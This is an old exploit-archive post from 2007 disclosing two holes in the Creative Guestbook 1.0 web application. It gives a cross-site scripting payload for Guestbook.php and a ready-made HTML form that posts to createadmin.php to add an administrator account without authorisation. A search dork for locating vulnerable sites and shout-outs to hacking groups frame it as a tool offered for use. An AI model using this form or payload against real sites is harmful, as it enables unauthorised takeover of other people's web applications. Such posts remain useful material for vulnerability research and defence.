Creative Guestbook 1.0 Multiple Remote Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Creative Guestbook 1.0 Multiple Remote Vulnerabilities
# Published : 2007-03-15
# Author : Dj7xpl
# Previous Title : CcMail 1.0.1 (update.php functions_dir) Remote File Inclusion Exploit
# Next Title : WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

.-""""""""-.                                 
                                                         /   Dj7xpl                                 
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  o_)( |                                     
                                                        |/     /     |                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) _________|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-IIIIII/-|________________________________>
                                               )_/                  / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   Creative Guestbook 1.0
#   Download   :   http://www.thecreativeheads.de/CreativeFiles/downloads.php
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Dork       :   "Creative Guestbook"
#   Class      :   (Add Remote Admin User)   And   (Cross Site Scripting)
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   css/xss :
#              http://[Target]/[Path]/Guestbook.php   <== Insert Yor Script
#              Example : <script> alert ('  dj7xpl ^_^  ') </script>
#
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   Add Remote Admin User :
#	
#	<form name="admin" method="post" action="http://[target]/[path]/createadmin.php?PHPSESSID='.session_id().'">
#       <input type="text" name="Name" value="name"><br>
#       <input type="text" name="Email"value="email"><br>
#       <input type="text" name="PASSWORD" value="password"><br>
#       <input type="submit" value="Admin hinzuf&uuml;gen" name="submit">
#   </form>
#	
#	
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# www.Syue.com [2007-03-15]